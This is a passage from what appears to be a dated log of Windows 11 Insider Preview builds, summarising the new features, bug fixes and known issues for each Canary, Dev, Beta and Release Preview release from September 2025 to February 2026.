Microsoft warns, “because of the focus on platform development for this path, you may notice a temporary loss in some features that you have today. These features will return to this new active development build.”

(Get more info about Windows 11 Insider Preview Build 29531.1000.)

Windows 11 Insider Preview Build 26220.7859

Release date: February 17, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build displays an option to upgrade to a different Microsoft 365 plan on the Accounts page within the Settings app. It also rolls out fixes for several bugs, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.

(Get more info about Windows 11 Preview Build 26220.7859.)

Windows 11 Insider Preview Builds 26100.7918 and 26200.7918

Release date: February 17, 2026

Released to: Release Preview Channel

This build gradually rolls out a variety of new features, including one in which Quick Machine Recovery (QMR) now turns on automatically for Windows Professional devices that are not domain‑joined and not enrolled in enterprise endpoint management. These devices receive the same recovery features available to Windows Home users. For domain‑joined or enterprise managed devices, QMR stays off unless it is enabled by the organization. The build also improves login screen reliability.

(Get more info about Windows 11 Insider Preview Builds 26100.7918 and 26200.7918.)

Windows 11 Insider Preview Build 28020.1611

Release date: February 12, 2026

Released to: Canary Channel

This build brings Sysmon functionality natively to Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and in a wide range of use cases.

(Get more info about Windows 11 Insider Preview Build 28020.1611.)

Windows 11 Insider Preview Build 26220.7755

Release date: February 9, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.

(Get more info about Windows 11 Insider Preview Build 226220.7755.)

Windows 11 Insider Preview Build 26300.7760

Release date: February 9, 2026

Released to: Dev Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.

(Get more info about Windows 11 Insider Preview Build 26300.7760.)

Windows 11 Insider Preview Build 28020.1546

Release date: February 4, 2026

Released to: Canary Channel

This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders” running Windows.

It also fixes one bug that affected apps working with files stored on OneDrive or Dropbox.

(Get more info about Windows 11 Insider Preview Build 28020.1546.)

Windows 11 Insider Preview Build 26220.7752

Release date: February 3, 2026

Released to: Beta Channel

Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and a wide range of use cases. (This feature is being gradually rolled out.)

The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.

(Get more info about Insider Preview Build 26220.7752.)

Windows 11 Insider Preview Build 26300.7733

Release date: February 3, 2026

Released to: Dev Channel

Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written on the Windows event log, enabling them to be used with security applications and a wide range of use cases. (This feature is being gradually rolled out.)

The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.

(Get more info about Insider Preview Build 26300.7733.)

Windows 11 Insider Preview Build 28020.1495

Release date: January 28, 2025

Released to: Canary Channel

This build, in Microsoft’s words, “includes a small set of general improvements and fixes that improve the overall experience [of Windows 11].” It also fixes a variety of bugs, including one that led to the Windows Update settings page hanging when loading.

The build has two known issues, one that sometimes causes all open File Explorer windows and tabs to unexpectedly jump to Desktop or Home in File Explorer, and another in which the desktop watermark is showing the wrong build number.

(Get more info about Insider Preview Build 28020.1495.)

Windows 11 Insider Preview Builds 26100.7701 and 26200.7701

Release date: January 27, 2026

Released to: Release Preview Channel

This build gradually rolls out a variety of new features for Copilot+ PCs, including one in which Narrator gives you more control over how it announces on‑screen controls. You can choose which details are spoken and adjust their order to match how you navigate apps. These settings apply throughout the app to help reduce extra speech and make Narrator easier to follow.

The build also immediately rolls out a variety of new features for all PCs, including one in Data Protection Application Programming Interface (DPAPI) domain backup key management. Administrators can now set how often keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.

(Get more info about Insider Preview Builds 26100.7701 and 26200.7701.)

Windows 11 Insider Preview Build 26220.7670

Release date: January 27, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for an issue in which the Search process was showing an icon with an X instead of a magnifying glass.

The build has five known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.

(Get more info about Insider Preview Build 26220.7670.)

Windows 11 Insider Preview Build 26300.7674

Release date: January 27, 2026

Released to: Dev Channel

In this build, the Dev Channel jumps ahead to receive 26300 series builds. This means that the window to switch from the Dev Channel to the Beta Channel is closed once Build 26300.7674is installed on your PC. This build for the Dev Channel is identical to the Windows 11 Build 26220.7653 release (see below).

(Get more info about Insider Preview Build 26300.7674.)

Windows 11 Insider Preview Build 26220.7653

Release date: January 21, 2026

Released to: Dev Channel

This build for the Dev Channel is identical to the January 16th Windows 11 Insider Preview Build 26220.7653 released to the Beta Channel. See the writeup below for details.

(Get more info about Windows 11 Insider Preview Build 26220.7653.)

Windows 11 Insider Preview Build 26220.7653

Release date: January 16, 2026

Released to: Beta Channel

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several changes, including one in which you can now set .webp images for your desktop background in Settings > Personalization > Desktop Background.

The same group also gets a number of bug fixes being gradually rolled out, including for a bug in which Settings crashed when interacting with audio devices.

The build has four known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.

(Get more info about Windows 11 Insider Preview Build 26220.7653.)

Windows 11 Insider Preview Build 28020.1371 

Release date: January 14, 2026

Released to: Canary Channel

This build gradually rolls out a variety of bug fixes for those who have turned the toggle on to receive the latest updates, including a bug in which File Explorer showed a white flash when navigating between pages.

There is one known issue in this build: The desktop watermark shows the wrong build number.

(Get more info about Windows 11 Insider Preview Build 28020.1371.)

Windows 11 Insider Preview Build 26220.7535

Release date: January 9, 2026

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out Copilot-powered image descriptions to Narrator on Copilot+ PCs, making it possible for blind and low-vision users to hear detailed, AI-generated descriptions of images, charts, and graphs.

The same group also gets a number of bug fixes being gradually rolled out, including for an issue in which File Explorer was causing explorer.exe to crash for some Insiders when invoking the context menu on the desktop.

The build has seven known issues, including one in which Settings crashes when interacting with audio devices.

(Get more info about Windows 11 Insider Preview Build 26220.7535.)

Windows 11 Insider Preview Build 26220.7523

Release date: December 19, 2025

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build gradually rolls out a version of Copilot on the taskbar tailored for commercial customers. It uses Work IQ as contextual information that they can reference in their Copilot chats and with Microsoft 365 AI agents. In addition, the build introduces Agent Launchers, a new framework that enables Windows apps to register AI agents and make them discoverable across the system.

The same group also gets a number of bug fixes being gradually rolled out, including one that addresses an issue in which File Explorer showed a white flash when navigating between pages.

The build has nine known issues, including one in which opening the context menu is causing explorer.exe to crash for some Insiders.

(Get more info about Windows 11 Insider Preview Build 26220.7523.)

Windows 11 Insider Preview Build 28020.1362

Release date: December 15, 2025

Released to: Canary Channel

This build gradually rolls out several new features for Copilot+ PCs, including a streamlined design for the Click to Do context menu that makes frequently used actions like Copy, Save, Share, and Open easier to access. It also rolls out new features for all PCs, including improvements to the dark mode experience in File Explorer.

A variety of bug fixes are being gradually rolled out, including one for an issue in which Settings became unresponsive when attempting to navigate to the Network & Internet section.

(Get more info about Windows 11 Insider Preview Build 28020.1362.)

Windows 11 Insider Preview Build 28000.1340 

Release date: December 9, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows. It also enables more of the new features and improvements originally released with the October non-security preview update for Windows 11.

In addition, the build fixes a bug that caused some Storage Spaces to become inaccessible or Storage Spaces Direct to fail when creating a storage cluster.

(Get more info about Windows 11 Insider Preview Build 28000.1340.)

Windows 11 Insider Preview Build 26220.7344

Release date: December 5, 2025

Released to: Dev & Beta Channels

For those who have turned the toggle on to receive the latest updates, this build offers native support for the Model Context Protocol (MCP), an open standard that gives AI agents a universal way to connect with apps, tools, and services. Agents can discover and connect to these tools and other agents via a secure, manageable Windows on-device registry (ODR). By default, all agent connectors in the Windows ODR will be contained in a secure environment with their own identity and audit trail.

In addition, Quick machine recovery (QMR) will now be turned on automatically for Windows Professional devices that are not domain joined. These devices will get the same recovery features as Windows Home users. For enterprise computers that are domain joined, nothing changes — QMR will stay off unless your organization turns it on.

Those who have turned the toggle on to receive the latest updates also get a number of bug fixes, including addressing a bug in which the search window to unexpectedly started floating above the taskbar.

The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.

(Get more info about Windows 11 Insider Preview Build 26220.7344.)

Windows 11 Insider Preview Build 26220.7271

Release date: November 21, 2025

Released to:  Dev & Beta Channels

This build introduces several features being rolled out gradually for those who have turned the toggle on to receive the latest updates. These include point-in-time restore for Windows, which lets you to quickly roll your device back to a previous state to minimize downtime and simplify troubleshooting, and (on NPU devices) fluid dictation in voice typing, which automatically corrects grammar, punctuation, and filler words as you speak.

The build also expands the availability of the Xbox full-screen experience to additional Windows 11 PCs. You can add a controller to your PC for task switching and streamlined gaming on your desktop, laptop, or tablet.

Those who have turned the toggle on to receive the latest updates also get several bug fixes, including one that resolves a hung taskbar after receiving certain notifications.

The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.

(Get more info about Windows 11 Insider Preview Build 26220.7271.)

Windows 11 Insider Preview Build 28000.1199

Release date: November 18, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.

(Get more info about Windows 11 Insider Preview Build 28000.1199.)

Windows 11 Insider Preview Builds 26100.7296 and 26200.7296

Release date: November 17, 2025

Released to: Release Preview Channel

This update introduces a wide range of features being rolled out gradually, including several for Copilot+ PCs, such as Windows Studio Effects, which provide AI-powered camera enhancements on an additional, alternative camera such as a USB webcam or your laptop’s built-in rear camera.

All Windows 11 PCs get a variety of new features being gradually rolled out, including Windows Hello Enhanced Sign-in Security (ESS), now supporting peripheral fingerprint sensors. Also, on PCs with the settings “quick machine recovery” and “automatically check for solutions” both enabled, Quick Machine Recovery now runs a one‑time scan by default instead of repeating scans in a loop. If a fix isn’t available right away, QMR will quickly point you to the most appropriate recovery options to get you back up and running.

A bug fix is being immediately rolled out to all PCs to address an issue that affects Local Security Authority Subsystem Service (LSASS), when LSASS could become unstable due to an access violation.

(Get more info about Windows 11 Insider Preview Builds 26100.7296 and 26200.7296.)

Windows 11 Insider Preview Build 26220.7262

Release date: November 17, 2025

Released to: Beta and Dev Channels

In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including using high-definition voices for English (US) in Narrator and Magnifier that use generative AI to adjust tone and pacing for more natural, expressive speech. Also rolling out is a new “Experimental agentic features” toggle in the Settings app that enables the creation of AI agent accounts and an agent workspace, and grants agentic apps access to your Documents, Downloads, Desktop, Music, Pictures, and Videos folders. (Find out more about experimental agentic features.)

The same group also gets a variety of bug fixes rolled out gradually, including for a bug in which the Task Manager process wasn’t stopping correctly after Task Manager was closed. As a result, Task Manager might have been unexpectedly open on boot.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer and when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7262.)

Windows 11 Insider Preview Build 26220.7070

Release date: November 7, 2025

Released to: Beta and Dev Channels

In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including the ability to choose your default dashboard in an updated Widget Board Settings.

Everyone gets an updated Quick Machine Recovery in Windows, which makes it easier and quicker to get back to a working PC. The experience in both Windows Settings and the Windows Recovery Environment (WinRE) has been streamlined.

A variety of bug fixes are being rolled out gradually to those who have opted to receive the latest updates, including one that fixes a bug in which the “Automatically hide the taskbar” setting unexpectedly turned off after displaying a message saying, “a toolbar is already hidden on this side of your screen.”

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7070.)

Windows 11 Insider Preview Build 28000

Release date: November 7, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes.” There are also a variety of bug fixes, including for a bug in which the credentials window was not accessible when trying to log in to Outlook.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.

(Get more info about Windows 11 Insider Preview Build 28000.)

Windows 11 Insider Preview Build 27982

Release date: November 4, 2025

Released to: Canary Channel

This build gradually rolls out several new features, including one in which you can add, remove, and rearrange lock screen widgets such as Weather, Watchlist, and Sports on the lock screen. Windows also provides suggested widgets on the lock screen. To customize your lock screen widgets, go to Settings > Personalization > Lock screen.

Also new is a “drag tray” that appears at the top of your screen when you drag a local file from File Explorer or your desktop. You can drop the file into one of the displayed apps or select More to open the Windows share window.

A variety of bugs have been fixed, including one in which if you used your PC for a while without rebooting, explorer.exe might start crashing repeatedly.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.

(Get more info about Windows 11 Insider Preview Build 27982.)

Windows 11 Insider Preview Build 26220.7051

Release date: October 31, 2025

Released to: Beta and Dev Channels

In this build, those have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including Ask Copilot in the taskbar, which gives  you one-click access to Copilot Vision and Voice, so you can search via Copilot using text, voice, or guided support with Copilot Vision. As you type, results appear and update instantly. Turn it on by going to Settings > Personalization > Taskbar > Ask Copilot.  You can also manage whether the Copilot app launches automatically at sign-in using the “Auto start on log in” toggle in the Copilot app settings.

The same group gets a variety of bug fixes being rolled out gradually, including one to address an issue in which  interacting with a folder or its contents in Start menu could result in the folder becoming invisible.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.7051.)

Windows 11 Insider Preview Build 26220.6982

Release date: October 24, 2025

Released to: Dev Channel

In this build, those have turned the toggle on to receive the latest updates get a variety of changes being gradually rolled out, including Copy & Search, which allows you to search the text in your clipboard with a single click. When you copy text anywhere in Windows, a paste gleam will appear in your search box. Click on this gleam and your copied text will appear in the search field, allowing you to search instantly.

The same group gets a variety of bug fixes, including one for a bug in which the search icon in File Explorer sometimes infinitely looped in an animation.

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in dark mode version of the copy dialog.

(Get more info about Windows 11 Insider Preview Build 26220.6982.)

Windows 11 Insider Preview Build 27975 

Release date: October 23, 2025

Released to: Canary Channel

This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.

A variety of bugs have also been fixed, including one in which Settings crashed when accessing drive information under Settings > System > Storage. This also impacted accessing the drive information from the properties when you right-clicked a drive in File Explorer.

There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolled to the top.

(Get more info about Windows 11 Insider Preview Build 27975.)

Windows 11 Builds 26100.7015 and 26200.7015

Release date: October 21, 2025

Released to: Release Preview Channel

This update includes a wide variety of new features being rolled out gradually, including a redesigned Start menu that includes a scrollable All section, has new category and grid views, and which adapts to your screen size. The build also includes new features for Click to Do, which can now translate text into other languages. File Explorer now has a recommended files feature that shows content such as files you frequently use, have recently downloaded, or have added to your File Explorer Gallery.

Two bugs are fixed in this build: one that caused an ACCESS_DENIED error when users attempted to change passwords remotely on member servers or workgroup devices, even when they had the required permissions, and another in which protected content playback failed on some machines after installing KB506408.

(Get more info about Windows 11 Insider Preview Builds 26100.7015 and 26200.7015.)

Windows 11 Insider Preview Build 26220.6972

Release date: October 17, 2025

Released to: Dev Channel

In this build, those who have turned the toggle on to receive the latest updates get a new feature being rolled out slowly, which lets you add and manage your mobile devices from Settings by navigating to “Mobile Devices” under the Bluetooth & Devices section. The page allows you to view your mobile devices, add new mobile devices, and manage features such as using your device as a connected camera or accessing your device’s files in File Explorer.

Those who have turned the toggle on to receive the latest updates get two bug fixes being rolled out slowly, one for a bug that caused File Explorer to show a Catastrophic Error (0x8000FFFF) when extracting large (1.5GB+) archive files, and another that sometimes caused an old white toolbar to randomly appear in File Explorer.

There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.

(Get more info about Windows 11 Insider Preview Build 26220.6972.)

Windows 11 Insider Preview Build 27971 

Release date: October 16, 2025

Released to: Canary Channel

In this build, the Notification Center can be used on secondary monitors. You’ll be able to see your calendar on any of your monitors and open Notification Center on any of them by clicking the date and time in the system tray of your taskbar. Note that this functionality will be rolled out gradually.

A variety of bugs have been fixed, including one in which File Explorer crashed when transferring files to a network drive.

There are three known issues in this build, including one in which sleep and shutdown aren’t working correctly for some Insiders.

(Get more info about Windows 11 Insider Preview Build 27971.)

Windows 11 Insider Preview Build 26120.6780 

Release date: October 10, 2025

Released to: Beta Channel

In this build, those with Copilot+ PCs who have turned the toggle on to receive the latest updates get a handful of changes and new features, including one in Settings in which more results appear in the search flyout and let you quickly modify the settings you’re searching for.

Those with any PCs who have turned the toggle on get several changes, including a new OneDrive icon in Accounts and Homepages in Settings, and the return of the ability to enable Administrator Protection via Windows Security under Account protection.

The same group gets a variety of bug fixes, including one for an issue in the previous flight in which File Explorer frequently crashed, and another that was causing the Start menu to unexpectedly scroll to the top when interacting with it.

There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.

(Get more info about Windows 11 Insider Preview Build 26120.6780.)

Windows 11 Insider Preview Build 26220.6780 

Release date: October 10, 2025

Released to: Dev Channel

This update is identical to Build 26120.6780 for the Beta Channel, detailed above.

(Get more info about Windows 11 Insider Preview Build 26220.6780.)

Windows 11 Insider Preview Build 27965

Release date: October 8, 2025

Released to: Canary Channel

This update introduces a new scrollable Start menu, with “All” on the top level, so apps are accessible without having to navigate to a secondary page. There are also new category and grid views to browse and launch your installed apps in the “All” section. The new menu adapts its size based on your device’s screen size.

There are also several bug fixes, including one in which the taskbar was not autohiding correctly.

There are four known issues in this build, including one in which Settings may crash when accessing drive information under Settings > System > Storage. This also impacts accessing the drive information from the properties when you right-click a drive in File Explorer.

(Get more info about Windows 11 Insider Preview Build 27965.)

Windows 11 Insider Preview Build 27959

Release date: October 6, 2025

Released to: Canary Channel

This update introduces the option to move the hardware indicators for brightness, volume, airplane mode, and virtual desktops to different positions on your screen, including the current bottom position and new top-left and top-center positions.

There are also a variety of bug fixes, including for one in which icons and text sometimes overlapped on the desktop when using increased text scaling.

There is one known issue in this build, in which sleep and shutdown aren’t working correctly for some Insiders.

(Get more info about Windows 11 Insider Preview Build 27959.)

Windows 11 Insider Preview Build 26120.6772

Release date: October 6, 2025

Released to: Beta Channel

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including Image Object select for Click to Do in Copilot+ PCs, in which you can   hover over your image to preview selectable areas. Once selected, you can copy and paste your object into other apps or use it to kick off a chat with Copilot. Also included are improvements to dark mode for File Explorer for all PCs and the ability to use peripheral fingerprint sensors with Windows Hello. These changes are rolling out gradually.

The same group gets a variety of bugs fixed, including one in which Encrypted File System (EFS) related dialogs in File Explorer weren’t responding to increased text scaling. The bug fixes are rolling out gradually.

There are five known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26120.6772.)

Windows 11 Insider Preview Build 26120.6772 

Release date: October 6, 2025

Released to: Dev Channel

This update is identical to Build 26120.6772, detailed above.

(Get more info about Windows 11 Insider Preview Build 26120.6772.)

Windows 11 Insider Preview Build 26120.6760

Release date: September 29, 2025

Released to: Beta Channel

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.

The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.

Everyone in the Beta Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures. 

There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26120.6760.)

Windows 11 Insider Preview Build 26220.6760 

Release date: September 29, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2.

In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.

The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.

Everyone in the Dev Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures. 

There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.

(Get more info about Windows 11 Insider Preview Build 26220.6760.)

Windows 11 Insider Preview Build 27954

Release date: September 25, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. It also includes fixes one bug in which you might not be able to connect to shared files and folders if you were using the Server Message Block (SMB) v1 protocol on NetBIOS over TCP/IP NetBIOS (NetBT) after the latest updates.

There is one known issue in this build, in which PIX on Windows is unable to play back GPU captures on this OS version. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, if you are affected, you can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and get help via private builds.

(Get more info about Windows 11 Insider Preview Build 27954.)

Windows 11 Insider Preview Build 26120.6690

Release date: September 19, 2025

Released to: Beta Channel

For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let users translate on-screen text with just a few clicks. 

All PCs that have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26120.6690.)

Windows 11 Insider Preview Build 26220.6690

Release date: September 19, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2. 

For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let you translate on-screen text with just a few clicks. 

All PCs which have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26220.6690.)

Windows 11 Insider Preview Build 27950

Release date: September 19, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. In addition, Advanced Settings will revert to the previous “For Developers” experience after updating to this build. 

There are also a number of bug fixes, including one in which the app preview windows in the taskbar became misaligned (away from the app icon you’d clicked / hovered over) after a display resolution change. 

There are two known issues in this build, including one for developers in which PIX on Windows is unable to play back GPU captures. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, anyone impacted can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and Microsoft can help provide private builds.

(Get more info about Windows 11 Insider Preview Build 27950.)

Windows 11 Insider Preview Builds 26100.6713 and 26200.6713

Release date: September 12, 2025

Released to: Release Preview Channel

Build 26100.6713 is for those on Windows 11 24H2, and 26200.6713 is for those on Windows 25H2.

These builds gradually roll out a large number of new features, including AI actions in File Explorer for editing images or summarizing documents, and the ability to pin favorite apps in the Windows share window to quickly access them when you need them.

The builds fix several bugs immediately, including one that disrupted Windows Update for those using Windows Server Update Services (WSUS). Additionally, several bug fixes are being gradually rolled out, including for a bug in which when Windows Sandbox was enabled, the VmmemCmFirstBoot process may have consumed large amounts of CPU after login, causing your PC to become unresponsive.

(Get more info about Windows 11 Insider Preview Builds 26100.6713 and 26200.6713.)

Windows 11 Insider Preview Build 26120.6682

Release date: September 12, 2025

Released to: Beta Channel

For those who have Copilot+ PCs and have turned the toggle on to receive the latest update, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot.

New emoji from Emoji 16.0 are being gradually rolled out in the emoji panel for those who have turned the toggle on to receive the latest updates.

The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.

There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26120.6682.)

Windows 11 Insider Preview Build 26220.6682

Release date: September 12, 2025

Released to: Dev Channel

This build is for those who have already upgraded to Windows 11 version 25H2.

For those who have Copilot+ PCs and have turned the toggle on to receive the latest updates, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot. New emoji from Emoji 16.0 are also being gradually rolled out to the same group.

The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.

There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.

(Get more info about Windows 11 Insider Preview Build 26220.6682.)

Windows 11 Insider Preview Build 27943

Release date: September 11, 2025

Released to: Canary Channel

This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows.

There are also a number of bug fixes, including for a bug that caused Settings > System > Storage > Temporary files to get stuck when scanning files. This issue also caused the entry to clean up previous Windows Installations to not show in Storage Settings.

There are five known issues in this build, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark, including “ACPI Audio Compositor” and others. Selecting Properties on these devices will show “Windows cannot load the device driver for this hardware. The driver may be corrupted or missing.”

(Get more info about Windows 11 Insider Preview Build 27943.)

Windows 11 Insider Preview Build 27938

Release date: September 8, 2025

Released to: Canary Channel

This build introduces AI actions into File Explorer. These offer new capabilities when you right-click a file, such as editing a graphic or summarizing a Word document. For now, there are four of them, all related to image files. You can perform a Bing search based on an image file, blur the background in an image, erase objects in an image, and remove the background in an image.

A number of bugs have been fixed, including one that caused Task Manager to freeze when going to the performance section, and another in which the red color used for a low space drive in This PC was unexpectedly light colored.

The build has five known issues, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark.

(Get more info about Windows 11 Insider Preview Build 27938.)

Windows 11 Insider Preview Build 26120.5790 

Release date: September 5, 2025

Released to: Beta Channel

For those who have Copilot+ PCs, this build introduces fluid dictation, which makes voice-based dictation easier. It automatically corrects grammar, punctuation, and filler words as you speak, reducing the need for manual editing. In addition, being rolled out on supported Copilot+ PCs is the ability to use Studio Effect’s AI-powered camera enhancements with an additional, alternative camera — such as a USB webcam or your laptop’s built-in rear camera.

Those in the Beta Channel who have turned the toggle on to receive the latest updates get new on-hover actions in File Manager Home for faster file management.

The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which the right-click context menu in File Explorer sometimes unexpectedly switched back and forth between the normal initial view and “Show more options” with each right-click when certain apps were installed.

There are five known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.

(Get more info about Windows 11 Insider Preview Build 26120.5790.)

Windows 11 Insider Preview Build 26220.5790 

Release date: September 5, 2025

Released to: Dev Channel

This build appears to be identical to Build 26120.5790 for the Beta Channel, detailed above.

(Get more info about Windows 11 Insider Preview Build 26220.5790.)

Hackers are targeting WordPress websites running a vulnerable version of the WP Maps Pro plugin, which allows creating rogue administrator accounts without authentication. [...]

Dutch authorities have announced the takedown of a botnet that enslaved millions of infected devices, including computers, tablets, smartphones, and IoT devices, to carry out malicious attacks. The bot network, per the Dutch Politie and the National Cyber Security Center (NCSC), consisted of at least 17 million infected devices. More than 200 servers located in the Netherlands acted as the Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]